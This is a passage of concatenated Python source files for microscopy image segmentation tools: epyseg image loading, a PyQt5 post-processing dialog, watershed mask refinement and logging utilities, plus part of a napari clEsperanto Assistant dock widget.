depth = meta_data['ImageDocument']['Metadata']['Information']['Image']['SizeZ']
image = np.squeeze(image) # removes all the empty dimensions
elif f.lower().endswith('.lif'):
# reader = read_lif.Reader(f)
# series = reader.getSeries()
# # print('series', len(series))
# chosen = series[0]
#
# meta_data = chosen.getMetadata()
# voxel_x = meta_data['voxel_size_x']
# voxel_y = meta_data['voxel_size_y']
# voxel_z = meta_data['voxel_size_z']
# width = meta_data['voxel_number_x']
# height = meta_data['voxel_number_y']
# depth = meta_data['voxel_number_z']
# channels = meta_data['channel_number']
# times = chosen.getTimeStamps()
# t_frames = chosen.getNbFrames()
#
# image = None
# for i in range(channels):
# cur_image = chosen.getFrame(channel=i)
# dimName = {1: 'X',
# 2: 'Y',
# 3: 'Z',
# 4: 'T',
# 5: 'Lambda',
# 6: 'Rotation',
# 7: 'XT Slices',
# 8: 'TSlices',
# 10: 'unknown'}
# cur_image = np.moveaxis(cur_image, -1, 0)
# if image is None:
# image = cur_image
# else:
# image = np.stack((image, cur_image), axis=-1)
image = None
reader = read_lif.Reader(f)
series = reader.getSeries()
# print('series', len(series))
if serie_to_open is None:
chosen = series[0]
else:
if serie_to_open >= len(series) or serie_to_open < 0:
logger.error('Out of range serie nb for current lif file, returning None')
return None
chosen = series[serie_to_open]
meta_data = chosen.getMetadata()
voxel_x = meta_data['voxel_size_x']
voxel_y = meta_data['voxel_size_y']
voxel_z = meta_data['voxel_size_z']
width = meta_data['voxel_number_x']
height = meta_data['voxel_number_y']
depth = meta_data['voxel_number_z']
channels = meta_data['channel_number']
times = chosen.getTimeStamps()
t_frames = chosen.getNbFrames()
# print('t_frames', t_frames)
# TODO check time points cause I think they are not ok for the t frames
# stack = None
for T in range(t_frames):
zstack = None
for i in range(channels):
cur_image = chosen.getFrame(T=T, channel=i)
# dimName = {1: 'X',
# 2: 'Y',
# 3: 'Z',
# 4: 'T',
# 5: 'Lambda',
# 6: 'Rotation',
# 7: 'XT Slices',
# 8: 'TSlices',
# 10: 'unknown'}
cur_image = np.moveaxis(cur_image, -1, 0)
if zstack is None:
zstack = cur_image
else:
zstack = np.stack((zstack, cur_image), axis=-1)
if image is None:
image = zstack[np.newaxis, ...]
# stack = image
else:
# print(image.shape, zstack.shape)
image = np.vstack((image, zstack[np.newaxis, ...]))
# stack = np.vstack((stack, image), axis = np.newaxis)
# if only one T --> reduce dimensionality
if t_frames == 1:
t_frames = None
# print('before squeeze', image.shape)
image = np.squeeze(image)
# image = stack
else:
if not f.lower().endswith('.npy') and not f.lower().endswith('.npz'):
# for some reason this stuff reads 8 bits images as RGB and that causes some trouble
image = skimage.io.imread(f)
else:
# load numpy image directly
if f.lower().endswith('.npy'):
image = np.load(f)
try:
with open(f + '.meta') as json_file:
metadata = json.load(json_file)
except:
logger.debug('could not load metadata ' + str(f + '.meta'))
# replace metadata from this file
return metadata, image
else:
all_data = np.load(f)
image = all_data['data']
# Dirty way to recover first data in an image if data does not exist...
if image is None:
for dat in all_data:
image = dat
break
# TODO allow support for metadata some day
return None, image
if voxel_x is not None and voxel_z is not None:
ar = voxel_z / voxel_x
logger.debug('original dimensions:' + str(image.shape))
if image.shape[1] != height and image.ndim == 4 and t_frames is None:
image = np.moveaxis(image, [1], -1)
if image.ndim >= 3 and image.shape[2] != height and image.ndim == 5:
image = np.moveaxis(image, [2], -1)
if channels is not None and image.ndim == 3 and image.shape[0] == channels:
image = np.moveaxis(image, [0], -1)
if channels is not None and image.ndim == 4 and image.shape[1] == channels:
image = np.moveaxis(image, [1], -1)
dimensions_string += 'hw'
if depth is not None:
dimensions_string = 'd' + dimensions_string
if channels is None and width != image.shape[-1] and len(image.shape) > 2:
channels = image.shape[-1]
if channels is not None and channels > 1:
dimensions_string += 'c'
if t_frames is not None:
dimensions_string = 't' + dimensions_string
else:
if image.ndim > len(dimensions_string):
dimensions_string = 't' + dimensions_string
t_frames = image.shape[0]
if width is None and image.ndim >= 3:
width = image.shape[-2]
if height is None and image.ndim >= 3:
height = image.shape[-3]
if width is None and image.ndim == 2:
width = image.shape[-1]
if height is None and image.ndim == 2:
height = image.shape[-2]
# update metadata
metadata.update({'w': width, 'h': height, 'c': channels, 'd': depth, 't': t_frames, 'bits': bits, 'vx': voxel_x,
'vy': voxel_y, 'vz': voxel_z, 'AR': ar, 'dimensions': dimensions_string, 'LUTs': luts,
'times': times, 'Overlays': overlays, 'ROI': roi})
# print(metadata)
logger.debug('image params:' + str(metadata))
logger.debug('final shape:' + str(image.shape))
return metadata, image
def imageread(self, filePath):
# TODO return other stuff here such as nb of frames ... do I need skimage to read or should I use smthg else
temp = skimage.io.imread(filePath[0])
h, w, c = temp.shape
d = len(filePath)
volume = np.zeros((d, w, h, c), dtype=np.uint16) # TODO why np.uint16 especially if imag is not ? FIX
k = 0
for img in filePath: # assuming tif
im = skimage.io.imread(img)
volume[k, :, :, :] = np.swapaxes(im[:, :, :], 0, 1)
k += 1
return volume
if __name__ == '__main__':
data = np.zeros((1024, 1024), dtype=np.uint8)
```
#### File: epyseg/postprocess/gui.py
```python
from PyQt5.QtWidgets import QDialog, QDoubleSpinBox, QToolTip, QPushButton, QDialogButtonBox
from PyQt5.QtWidgets import QApplication, QGridLayout
from PyQt5.QtWidgets import QSpinBox, QComboBox, QVBoxLayout, QLabel, QCheckBox, QGroupBox
from PyQt5.QtCore import Qt, QPoint
from PyQt5 import QtWidgets, QtCore
import sys
# logging
from epyseg.deeplearning.docs.doc2html import markdown_file_to_html
from epyseg.tools.logger import TA_logger
logger = TA_logger()
class PostProcessGUI(QDialog):
def __init__(self, parent_window=None, _is_dialog=False):
super().__init__(parent=parent_window)
self._is_dialog = _is_dialog
self.initUI()
def initUI(self):
input_v_layout = QVBoxLayout()
input_v_layout.setAlignment(Qt.AlignTop)
input_v_layout.setContentsMargins(0, 0, 0, 0)
# TODO add a set of parameters there for the post process
self.groupBox_post_process = QGroupBox(
'Refine segmentation/Create a binary mask', objectName='groupBox_post_process')
self.groupBox_post_process.setCheckable(True)
self.groupBox_post_process.setChecked(True)
# self.groupBox_post_process.setEnabled(True)
group_box_post_process_parameters_layout = QGridLayout()
group_box_post_process_parameters_layout.setAlignment(Qt.AlignTop)
group_box_post_process_parameters_layout.setHorizontalSpacing(3)
group_box_post_process_parameters_layout.setVerticalSpacing(3)
# do a radio dialog with all the stuff needed...
# test all
post_process_method_selection_label = QLabel('Post process method') # (or bond score for pretrained model)
post_process_method_selection_label.setStyleSheet("QLabel { color : red; }")
self.post_process_method_selection = QComboBox(objectName='post_process_method_selection')
self.post_process_method_selection.addItem('Default (Slow/robust) (EPySeg pre-trained model only!)')
self.post_process_method_selection.addItem('Fast (May contain more errors) (EPySeg pre-trained model only!)')
self.post_process_method_selection.addItem('Old method (Sometimes better than default) (EPySeg pre-trained model only!)')
self.post_process_method_selection.addItem('Simply binarize output using threshold')
self.post_process_method_selection.addItem('Keep first channel only')
self.post_process_method_selection.addItem('None (Raw model output)')
self.post_process_method_selection.currentTextChanged.connect(self._post_process_method_changed)
group_box_post_process_parameters_layout.addWidget(post_process_method_selection_label, 0, 0, 1, 1)
group_box_post_process_parameters_layout.addWidget(self.post_process_method_selection, 0, 1, 1, 3)
# TODO --> always make this relative
threshold_label = QLabel(
'Threshold: (in case of over/under segmentation, please increase/decrease, respectively)') # (or bond score for pretrained model)
threshold_label.setStyleSheet("QLabel { color : red; }")
self.threshold_bond_or_binarisation = QDoubleSpinBox(objectName='threshold_bond_or_binarisation')
self.threshold_bond_or_binarisation.setSingleStep(0.01)
self.threshold_bond_or_binarisation.setRange(0.01, 1) # 100_000 makes no sense (oom) but anyway
self.threshold_bond_or_binarisation.setValue(0.42) # probably should be 1 to 3 depending on the tissue
self.threshold_bond_or_binarisation.setEnabled(False)
# threshold_hint = QLabel() # (or bond score for pretrained model)
self.autothreshold = QCheckBox("Auto",objectName='autothreshold')
self.autothreshold.setChecked(True)
self.autothreshold.stateChanged.connect(self._threshold_changed)
group_box_post_process_parameters_layout.addWidget(threshold_label, 1, 0, 1, 2)
group_box_post_process_parameters_layout.addWidget(self.threshold_bond_or_binarisation, 1, 2)
group_box_post_process_parameters_layout.addWidget(self.autothreshold, 1, 3)
# groupBox_post_process_parameters_layout.addWidget(threshold_hint, 0, 3)
filter_by_size_label = QLabel('Further filter segmentation by size:')
self.filter_by_cell_size_combo = QComboBox(objectName='filter_by_cell_size_combo')
self.filter_by_cell_size_combo.addItem('None (quite often the best choice)')
self.filter_by_cell_size_combo.addItem('Local median (slow/very good) divided by')
self.filter_by_cell_size_combo.addItem('Cells below Average area (global) divided by')
self.filter_by_cell_size_combo.addItem('Global median divided by')
self.filter_by_cell_size_combo.addItem('Cells below size (in px)')
# add a listener to model Architecture
self.filter_by_cell_size_combo.currentTextChanged.connect(self._filter_changed)
group_box_post_process_parameters_layout.addWidget(filter_by_size_label, 2, 0)
group_box_post_process_parameters_layout.addWidget(self.filter_by_cell_size_combo, 2, 1, 1, 2)
self.avg_area_division_or_size_spinbox = QSpinBox(objectName='avg_area_division_or_size_spinbox')
self.avg_area_division_or_size_spinbox.setSingleStep(1)
self.avg_area_division_or_size_spinbox.setRange(1, 10000000) # 100_000 makes no sense (oom) but anyway
self.avg_area_division_or_size_spinbox.setValue(2) # probably should be 1 to 3 depending on the tissue
self.avg_area_division_or_size_spinbox.setEnabled(False)
group_box_post_process_parameters_layout.addWidget(self.avg_area_division_or_size_spinbox, 2, 3)
self.prevent_exclusion_of_too_many_cells_together = QCheckBox('Do not exclude groups bigger than', objectName='prevent_exclusion_of_too_many_cells_together')
self.prevent_exclusion_of_too_many_cells_together.setChecked(False)
self.prevent_exclusion_of_too_many_cells_together.setEnabled(False)
# max_nb_of_cells_to_be_excluded_together_label = QLabel('Group size')
self.max_nb_of_cells_to_be_excluded_together_spinbox = QSpinBox(objectName='max_nb_of_cells_to_be_excluded_together_spinbox')
self.max_nb_of_cells_to_be_excluded_together_spinbox.setSingleStep(1)
self.max_nb_of_cells_to_be_excluded_together_spinbox.setRange(1, 10000000) # max makes no sense
self.max_nb_of_cells_to_be_excluded_together_spinbox.setValue(
3) # default should be 2 or 3 because seg is quite good so above makes no sense
self.max_nb_of_cells_to_be_excluded_together_spinbox.setEnabled(False)
cells_text_labels = QLabel('cells')
self.restore_secure_cells = QCheckBox('Restore most likely cells',objectName='restore_secure_cells')
self.restore_secure_cells.setChecked(False)
self.restore_secure_cells.setEnabled(False)
# help for post process
# help_ico = QIcon.fromTheme('help-contents')
self.help_button_postproc = QPushButton('?', None)
bt_width = self.help_button_postproc.fontMetrics().boundingRect(self.help_button_postproc.text()).width() + 7
self.help_button_postproc.setMaximumWidth(bt_width * 2)
self.help_button_postproc.clicked.connect(self.show_tip)
group_box_post_process_parameters_layout.addWidget(self.restore_secure_cells, 3, 0)
group_box_post_process_parameters_layout.addWidget(self.prevent_exclusion_of_too_many_cells_together, 3, 1)
group_box_post_process_parameters_layout.addWidget(self.max_nb_of_cells_to_be_excluded_together_spinbox, 3, 2)
group_box_post_process_parameters_layout.addWidget(cells_text_labels, 3, 3)
# TODO --> improve layout to make help button smaller
group_box_post_process_parameters_layout.addWidget(self.help_button_postproc, 0, 5, 3, 1)
self.groupBox_post_process.setLayout(group_box_post_process_parameters_layout)
input_v_layout.addWidget(self.groupBox_post_process)
self.setLayout(input_v_layout)
if self._is_dialog:
# OK and Cancel buttons
self.buttons = QDialogButtonBox(QDialogButtonBox.Ok | QDialogButtonBox.Cancel,
QtCore.Qt.Horizontal, self)
self.buttons.accepted.connect(self.accept)
self.buttons.rejected.connect(self.reject)
self.layout().addWidget(self.buttons)
def _threshold_changed(self):
self.threshold_bond_or_binarisation.setEnabled(not self.autothreshold.isChecked())
# self.post_process_method_selection.addItem('Default (Slow/robust)')
# self.post_process_method_selection.addItem('Fast (May contain more errors)')
# self.post_process_method_selection.addItem('Old method (Less constant than default but sometimes better)')
# self.post_process_method_selection.addItem('Simply binarize output using threshold')
# self.post_process_method_selection.addItem('None (Raw model output)')
def _post_process_method_changed(self):
text = self.post_process_method_selection.currentText().lower()
if 'none' in text or 'first' in text:
self.set_threshold_enabled(False)
self.set_safety_parameters(False)
self.set_filter_by_size_enabled(False)
elif 'simply' in text:
self.set_threshold_enabled(True)
self.set_safety_parameters(False)
self.set_filter_by_size_enabled(False)
elif 'old' in text:
self.set_threshold_enabled(False)
self.set_safety_parameters(True)
self.set_filter_by_size_enabled(True)
else:
self.set_threshold_enabled(True)
self.set_safety_parameters(False)
self.set_filter_by_size_enabled(True)
def set_filter_by_size_enabled(self, bool):
if bool is False:
self.filter_by_cell_size_combo.setEnabled(False)
self.avg_area_division_or_size_spinbox.setEnabled(False)
else:
self.filter_by_cell_size_combo.setEnabled(True)
self.avg_area_division_or_size_spinbox.setEnabled(True)
def set_threshold_enabled(self, bool):
if bool is False:
self.autothreshold.setEnabled(False)
self.threshold_bond_or_binarisation.setEnabled(False)
else:
self.autothreshold.setEnabled(True)
self._threshold_changed()
def set_safety_parameters(self, bool):
self._filter_changed()
def show_tip(self):
QToolTip.showText(self.sender().mapToGlobal(QPoint(30, 30)), markdown_file_to_html('refine_segmentation.md'))
def isChecked(self):
return self.groupBox_post_process.isChecked()
def setChecked(self, bool):
return self.groupBox_post_process.setChecked(bool)
def _filter_changed(self):
current_filter = self.filter_by_cell_size_combo.currentText().lower()
current_mode = self.post_process_method_selection.currentText().lower()
if 'one' in current_filter:
self.avg_area_division_or_size_spinbox.setEnabled(False)
self.max_nb_of_cells_to_be_excluded_together_spinbox.setEnabled(False)
self.prevent_exclusion_of_too_many_cells_together.setEnabled(False)
self.restore_secure_cells.setEnabled(False)
else:
self.avg_area_division_or_size_spinbox.setEnabled(True)
self.max_nb_of_cells_to_be_excluded_together_spinbox.setEnabled(True)
self.prevent_exclusion_of_too_many_cells_together.setEnabled(True)
self.restore_secure_cells.setEnabled(True)
if 'divided' in current_filter:
self.avg_area_division_or_size_spinbox.setValue(2)
else:
self.avg_area_division_or_size_spinbox.setValue(300)
if not 'old' in current_mode:
self.max_nb_of_cells_to_be_excluded_together_spinbox.setEnabled(False)
self.prevent_exclusion_of_too_many_cells_together.setEnabled(False)
self.restore_secure_cells.setEnabled(False)
def _get_post_process_filter(self):
current_filter = self.filter_by_cell_size_combo.currentText().lower()
if 'one' in current_filter or not self.filter_by_cell_size_combo.isEnabled():
return None
if 'size' in current_filter:
return self.avg_area_division_or_size_spinbox.value()
if 'verage' in current_filter:
return 'avg'
if 'local' in current_filter:
return 'local'
if 'global' in current_filter:
return 'global median'
def get_parameters_directly(self):
'''Get the parameters for model training
Returns
-------
dict
containing post processing parameters
'''
self.post_process_parameters = {}
post_proc_method = self.post_process_method_selection.currentText().lower()
if 'none' in post_proc_method:
self.post_process_parameters['post_process_algorithm'] = None
else:
self.post_process_parameters['post_process_algorithm'] = post_proc_method
self.post_process_parameters['filter'] = self._get_post_process_filter()
if self.threshold_bond_or_binarisation.isEnabled():
self.post_process_parameters['threshold'] = self.threshold_bond_or_binarisation.value()
if self.autothreshold.isEnabled() and self.autothreshold.isChecked():
self.post_process_parameters[
'threshold'] = None # None means autothrehsold # maybe add more options some day
if self.avg_area_division_or_size_spinbox.isEnabled():
self.post_process_parameters['correction_factor'] = self.avg_area_division_or_size_spinbox.value()
if self.restore_secure_cells.isEnabled():
self.post_process_parameters['restore_safe_cells'] = self.restore_secure_cells.isChecked()
if self.max_nb_of_cells_to_be_excluded_together_spinbox.isEnabled():
self.post_process_parameters[
'cutoff_cell_fusion'] = self.max_nb_of_cells_to_be_excluded_together_spinbox.value() if self.prevent_exclusion_of_too_many_cells_together.isChecked() else None
if 'old' in self.post_process_method_selection.currentText().lower():
# just for max use that --> maybe do this as an option some day
self.post_process_parameters['hq_predictions'] = 'max'
return self.post_process_parameters
def get_parameters(self):
return (self.get_parameters_directly())
@staticmethod
def getDataAndParameters(parent_window=None, _is_dialog=False):
# get all the params for augmentation
dialog = PostProcessGUI(parent_window=parent_window, _is_dialog=_is_dialog)
result = dialog.exec_()
parameters = dialog.get_parameters()
return (parameters, result == QDialog.Accepted)
# now really try to get the parameters properly
if __name__ == '__main__':
# just for a test
app = QApplication(sys.argv)
parameters, ok = PostProcessGUI.getDataAndParameters(parent_window=None)
print(parameters, ok)
sys.exit(0)
# TODO change default parameters depending on whether a pre-trained model is selected or not
# TODO allow retraining of the model --> just give it a try...
```
#### File: epyseg/postprocess/refine_v2.py
```python
from scipy import ndimage
from skimage.filters import threshold_otsu
# from skimage.morphology import watershed
from skimage.segmentation import watershed
from epyseg.img import Img
from skimage.measure import label, regionprops
import os
import numpy as np
# logging
from epyseg.tools.logger import TA_logger
import tempfile
from epyseg.postprocess.filtermask import FilterMask
from epyseg.postprocess.edmshed import segment_cells
logger = TA_logger()
class RefineMaskUsingSeeds:
def __init__(self):
pass
def process(self, input=None, mode=None, _DEBUG=False, _VISUAL_DEBUG=False, output_folder=tempfile.gettempdir(),
output_name='handCorrection.tif', threshold=None,
filter=None,
correction_factor=2,
**kwargs):
if input is None:
logger.error('no input image --> nothing to do')
return
# TODO test it with several images just to see if that works
if isinstance(mode, str) and 'first' in mode:
# return first channel only # shall I had a channel axis to it to avoid issues
out = input[..., 0]
# I do this to keep the ...hwc format...
return out[..., np.newaxis]
img_orig = input
if not img_orig.has_c() or img_orig.shape[-1] != 7:
# TODO in fact could do the fast mode still on a single image --> may be useful
logger.error('image must have 7 channels to be used for post process')
return img_orig
if _DEBUG:
Img(img_orig, dimensions='hwc').save(os.path.join(output_folder, 'raw_input.tif'))
bckup_img_wshed = img_orig[..., 0].copy()
if mode is not None and isinstance(mode, str):
if 'ast' in mode:
logger.debug('fast mode')
img_orig[..., 0] += img_orig[..., 1]
img_orig[..., 0] += img_orig[..., 2]
img_orig = img_orig[..., 0] / 3
img_orig = np.reshape(img_orig, (*img_orig.shape, 1))
else:
logger.debug('normal mode')
else:
logger.debug('normal mode')
differing_bonds = np.zeros_like(img_orig)
img_orig[..., 0] = segment_cells(img_orig[..., 0], min_threshold=0.02, min_unconnected_object_size=3)
if img_orig.shape[-1] >= 5:
img_orig[..., 1] = segment_cells(img_orig[..., 1], min_threshold=0.06, min_unconnected_object_size=6)
img_orig[..., 2] = segment_cells(img_orig[..., 2], min_threshold=0.15, min_unconnected_object_size=12)
img_orig[..., 3] = Img.invert(img_orig[..., 3])
img_orig[..., 3] = segment_cells(img_orig[..., 3], min_threshold=0.06, min_unconnected_object_size=6)
img_orig[..., 4] = Img.invert(img_orig[..., 4])
img_orig[..., 4] = segment_cells(img_orig[..., 4], min_threshold=0.15, min_unconnected_object_size=12)
if img_orig.shape[-1] == 7:
img_orig[..., 5] = self.binarise(img_orig[..., 5], threshold=0.15)
img_orig[..., 6] = Img.invert(img_orig[..., 6])
img_orig[..., 6] = self.binarise(img_orig[..., 6], threshold=0.1)
if _DEBUG:
Img(img_orig, dimensions='hwc').save(os.path.join(output_folder, 'thresholded_masks.tif'))
# get watershed mask for all images
for i in range(img_orig.shape[-1]):
if i < 5:
final_seeds = label(Img.invert(img_orig[..., i]), connectivity=1, background=0)
else:
final_seeds = label(img_orig[..., i], connectivity=None, background=0)
final_wshed = watershed(bckup_img_wshed, markers=final_seeds, watershed_line=True)
final_wshed[final_wshed != 0] = 1
final_wshed[final_wshed == 0] = 255
final_wshed[final_wshed == 1] = 0
differing_bonds[..., i] = final_wshed
del final_seeds
del final_wshed
if _DEBUG:
print(os.path.join(output_folder, 'differences.tif'))
Img(differing_bonds, dimensions='hwc').save(os.path.join(output_folder, 'differences.tif'))
Img(bckup_img_wshed, dimensions='hw').save(os.path.join(output_folder, 'orig_img.tif'))
avg = np.mean(differing_bonds, axis=-1)
avg = avg / avg.max()
if _DEBUG:
Img(avg, dimensions='hw').save(os.path.join(output_folder, output_name + str('avg.tif')))
if threshold is None:
threshold = self.autothreshold(avg)
logger.debug('threshold used for producing the final mask=' + str(threshold))
final_mask = avg.copy()
final_mask = self.binarise(final_mask, threshold=threshold)
if _DEBUG:
Img(final_mask, dimensions='hw').save(os.path.join(output_folder, 'binarized.tif'))
# close wshed mask to fill super tiny holes
s = ndimage.generate_binary_structure(2, 1)
final_mask = ndimage.grey_dilation(final_mask, footprint=s)
# remove super tiny artificial cells (very small value cause already dilated)
mask = label(Img.invert(final_mask), connectivity=1, background=0)
for region in regionprops(mask):
if region.area < 5:
for coordinates in region.coords:
final_mask[coordinates[0], coordinates[1]] = 255
del mask
final_mask = label(Img.invert(final_mask), connectivity=1, background=0)
final_mask = watershed(bckup_img_wshed, markers=final_mask, watershed_line=True)
final_mask[final_mask != 0] = 1
final_mask[final_mask == 0] = 255
final_mask[final_mask == 1] = 0
if filter is None or filter == 0:
return final_mask.astype(np.uint8)
else:
logger.debug('Further filtering image')
return FilterMask(bckup_img_wshed, final_mask, filter=filter, correction_factor=correction_factor)
def autothreshold(self, single_2D_img):
try:
return threshold_otsu(single_2D_img)
except ValueError:
logger.error('Image is just one color, thresholding cannot be done')
return single_2D_img
def binarise(self, single_2D_img, threshold=0.5, bg_value=0, fg_value=255):
# TODO may change this to >= and < try it
single_2D_img[single_2D_img > threshold] = fg_value
single_2D_img[single_2D_img <= threshold] = bg_value
return single_2D_img
```
#### File: epyseg/tools/logger.py
```python
import logging
class TA_logger(object):
# DEBUG < INFO < WARNING < ERROR < CRITICAL
default_format = '%(levelname)s - %(asctime)s - %(filename)s - %(funcName)s - line %(lineno)d - %(message)s\n'
master_logger_name = 'master'
DEBUG = logging.DEBUG
INFO = logging.INFO
WARNING = logging.WARNING
ERROR = logging.ERROR
CRITICAL = logging.CRITICAL
DEFAULT = INFO
loggers = {}
def __new__(cls, name=master_logger_name, logging_level=DEFAULT, format=default_format, handler=None):
if name is not None:
if name in cls.loggers:
return cls.loggers.get(name)
logger = logging.getLogger(name)
if handler is None:
# create a formatter
formatter = logging.Formatter(format)
# create handler
handler = logging.StreamHandler()
handler.setFormatter(formatter)
logger.addHandler(handler)
# set level to logging_level
cls.DEFAULT = logging_level
logger.setLevel(logging_level)
cls.loggers[name] = logger
return logger
@staticmethod
def setHandler(handler, name=master_logger_name):
# easy way to redirect all logs to the same logger
logger = logging.getLogger(name)
try:
for hndlr in logger.handlers:
logger.removeHandler(hndlr)
except:
pass
logger.addHandler(handler)
logger.setLevel(TA_logger.DEFAULT)
if __name__ == '__main__':
logger = TA_logger()
logger.debug("test")
logger.info("test")
logger.warning("test")
logger.error("test")
logger.critical("test")
formatter = logging.Formatter(TA_logger.default_format)
handler = logging.StreamHandler()
handler.setFormatter(formatter)
TA_logger.setHandler(handler)
logger.debug("test")
logger.info("test")
logger.warning("test")
logger.error("test")
logger.critical("test")
```
#### File: epyseg/tools/qthandler.py
```python
import sys
from PyQt5 import QtCore, QtGui, QtWidgets
import logging
class QtHandler(logging.Handler):
def __init__(self):
logging.Handler.__init__(self)
def emit(self, record):
record = self.format(record)
if record:
if record.startswith('ERROR') or record.startswith('CRITICAL'):
XStream.stderr().write('%s' % record)
else:
XStream.stdout().write('%s' % record)
class XStream(QtCore.QObject):
_stdout = None
_stderr = None
messageWritten = QtCore.pyqtSignal(str)
def flush(self):
pass
def fileno(self):
return -1
def write(self, msg):
if (not self.signalsBlocked()):
self.messageWritten.emit(msg)
@staticmethod
def stdout():
if (not XStream._stdout):
XStream._stdout = XStream()
sys.stdout = XStream._stdout
return XStream._stdout
@staticmethod
def stderr():
if (not XStream._stderr):
XStream._stderr = XStream()
sys.stderr = XStream._stderr
return XStream._stderr
``` |
{
"source": "jo-mueller/napari_pyclesperanto_assistant",
"score": 2
} |
#### File: napari_pyclesperanto_assistant/_gui/_Assistant.py
```python
from __future__ import annotations
from pathlib import Path
from typing import TYPE_CHECKING, Dict, Tuple, Callable
from warnings import warn
import napari
import pyclesperanto_prototype as cle
from qtpy.QtWidgets import QFileDialog, QLineEdit, QVBoxLayout, QHBoxLayout, QWidget, QMenu, QLabel
from qtpy.QtGui import QCursor, QIcon
from typing import Union
from ._select_gpu import select_gpu
from .._categories import CATEGORIES, Category, filter_categories
from .._pipeline import Pipeline
from ._button_grid import ButtonGrid
from ._category_widget import (
OP_ID,
OP_NAME_PARAM,
VIEWER_PARAM,
make_gui_for_category,
num_positional_args
)
if TYPE_CHECKING:
from magicgui.widgets import FunctionGui
from napari.layers import Layer
from napari.viewer import Viewer
from napari import __version__ as napari_version
from packaging.version import parse as parse_version
from napari_tools_menu import register_dock_widget
npv = parse_version(napari_version)
NAP048 = (npv.major, npv.minor, npv.micro) >= (0, 4, 8)
@register_dock_widget(menu="Utilities > Assistant (clEsperanto)")
class Assistant(QWidget):
"""The main cle Assistant widget.
The widget holds buttons with icons to create widgets for the various
cel operation categories. It tracks which layers are connected to which
widgets, and can export the state of the task graph to a dask graph
or to jython code.
Parameters
----------
napari_viewer : Viewer
This viewer instance will be provided by napari when it gets added
as a plugin dock widget.
"""
def __init__(self, napari_viewer: Viewer):
super().__init__()
self._viewer = napari_viewer
napari_viewer.layers.events.removed.connect(self._on_layer_removed)
napari_viewer.layers.selection.events.changed.connect(self._on_selection)
self._layers = {}
# visualize intermediate results human-readable from top-left to bottom-right
self._viewer.grid.stride = -1
CATEGORIES["Measure"] = self._measure
CATEGORIES["Generate code..."] = self._code_menu
# build GUI
icon_grid = ButtonGrid(self)
icon_grid.addItems(CATEGORIES)
icon_grid.itemClicked.connect(self._on_item_clicked)
self.seach_field = QLineEdit("")
def text_changed(*args, **kwargs):
search_string = self.seach_field.text().lower()
icon_grid.clear()
icon_grid.addItems(filter_categories(search_string))
self.seach_field.textChanged.connect(text_changed)
# create menu
self.actions = [
("Export Python script to file", self.to_jython),
("Export Jupyter Notebook", self.to_notebook),
("Copy to clipboard", self.to_clipboard),
]
# add Send to script editor menu in case it's installed
try:
import napari_script_editor
self.actions.append(("Send to Script Editor", self.to_script_editor))
except ImportError:
pass
self.setLayout(QVBoxLayout())
search_and_help = QWidget()
search_and_help.setLayout(QHBoxLayout())
from ._button_grid import _get_icon
help = QLabel("?")
help.setToolTip(
'<html>'
'Use the search field on the left to enter a term describing the function you would like to apply to your image.\n'
'Searching will limit the number of shown categories and listed operations.\n'
'<br><br>The icons in the buttons below denote the processed image types:\n'
'<br><img src="' + _get_icon("intensity_image") + '" width="24" heigth="24"> In <b>intensity images</b> the pixel value represents a measurement, e.g. of collected light during acquisition in a microscope.\n'
'<br><img src="' + _get_icon("binary_image") + '" width="24" heigth="24"> In <b>binary images</b> pixels with value 0 mean there is no object present. All other pixels (typically value 1) represent any object.\n'
'<br><img src="' + _get_icon("label_image") + '" width="24" heigth="24"> In <b>label images</b> the integer pixel intensity corresponds to the object identity. E.g. all pixels of object 2 have value 2.\n'
'<br><img src="' + _get_icon("parametric_image") + '" width="24" heigth="24"> In <b>parametric images</b> the pixel value represents an object measurement. All pixels of an object can for example contain the same value, e.g. the objects circularity or area.\n'
'<br><img src="' + _get_icon("mesh_image") + '" width="24" heigth="24"> In <b>mesh images</b> we can visualize connectivity between objects and distances as intensity along lines.\n'
'<br><img src="' + _get_icon("any_image") + '" width="24" heigth="24"> This icon means one can use <b>any kind of image</b> for this operation.'
'</html>'
)
help.setMaximumWidth(20)
search_and_help.layout().addWidget(self.seach_field)
search_and_help.layout().addWidget(help)
self.layout().addWidget(search_and_help)
self.layout().addWidget(icon_grid)
self.layout().setContentsMargins(5, 5, 5, 5)
self.setMinimumWidth(345)
select_gpu()
def _measure(self):
from .._statistics_of_labeled_pixels import statistics_of_labeled_pixels
self._viewer.window.add_function_widget(statistics_of_labeled_pixels)
def _code_menu(self):
menu = QMenu(self)
for name, cb in self.actions:
submenu = menu.addAction(name)
submenu.triggered.connect(cb)
menu.move(QCursor.pos())
menu.show()
def _on_selection(self, event):
for layer, (dw, gui) in self._layers.items():
if layer in self._viewer.layers.selection:
dw.show()
else:
dw.hide()
def _on_active_layer_change(self, event):
for layer, (dw, gui) in self._layers.items():
dw.show() if event.value is layer else dw.hide()
def _on_layer_removed(self, event):
layer = event.value
if layer in self._layers:
dw = self._layers[layer][0]
try:
self._viewer.window.remove_dock_widget(dw)
except KeyError:
pass
# remove layer from internal list
self._layers.pop(layer)
def _on_item_clicked(self, item):
self._activate(CATEGORIES.get(item.text()))
def _get_active_layer(self):
return self._viewer.layers.selection.active
def _activate(self, category = Union[Category, Callable]):
if callable(category):
category()
return
# get currently active layer (before adding dock widget)
input_layer = self._get_active_layer()
if not input_layer:
warn("Please select a layer first")
return False
# make a new widget
gui = make_gui_for_category(category, self.seach_field.text(), self._viewer)
# prevent auto-call when adding to the viewer, to avoid double calls
# do this here rather than widget creation for the sake of
# non-Assistant-based widgets.
gui._auto_call = False
# add gui to the viewer
dw = self._viewer.window.add_dock_widget(gui, area="right", name=category.name)
# make sure the originally active layer is the input
try:
gui.input0.value = input_layer
except ValueError:
pass # this happens if input0 should be labels but we provide an image
# call the function widget &
# track the association between the layer and the gui that generated it
self._layers[gui()] = (dw, gui)
# turn on auto_call, and make sure that if the input changes we update
gui._auto_call = True
self._connect_to_all_layers()
def _refesh_data(self, event):
self._refresh(event.source)
def _refresh(self, changed_layer):
"""Goes through all layers and refreshs those which have changed_layer as input
Parameters
----------
changed_layer
"""
for layer, (dw, mgui) in self._layers.items():
for w in mgui:
if w.value == changed_layer:
mgui()
def _connect_to_all_layers(self):
"""Attach an event listener to all layers that are currently open in napari
"""
for layer in self._viewer.layers:
layer.events.data.disconnect(self._refesh_data)
layer.events.data.connect(self._refesh_data)
def load_sample_data(self, fname="Lund_000500_resampled-cropped.tif"):
data_dir = Path(__file__).parent.parent / "data"
self._viewer.open(str(data_dir / fname))
def _id_to_name(self, id, dict):
if id not in dict.keys():
new_name = "image" + str(len(dict.keys()))
dict[id] = new_name
